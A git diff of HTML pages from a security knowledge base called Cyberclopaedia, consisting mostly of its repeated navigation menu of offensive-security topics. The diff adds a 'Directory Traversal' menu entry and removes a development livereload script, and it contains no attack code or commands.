      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -260,22 +260,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html b/docs/Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html index 91dbf32a..7de5c43c 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Kernel Exploits.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

E - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html b/docs/Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html index 2e626d36..70741b24 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/NFS Root Squashing.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -213,22 +213,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html b/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html index 6f6195e3..1447ea6d 100644 --- a/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html +++ b/docs/Post Exploitation/Privilege Escalation/Linux/Sudo Escalation via LD_PRELOAD.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
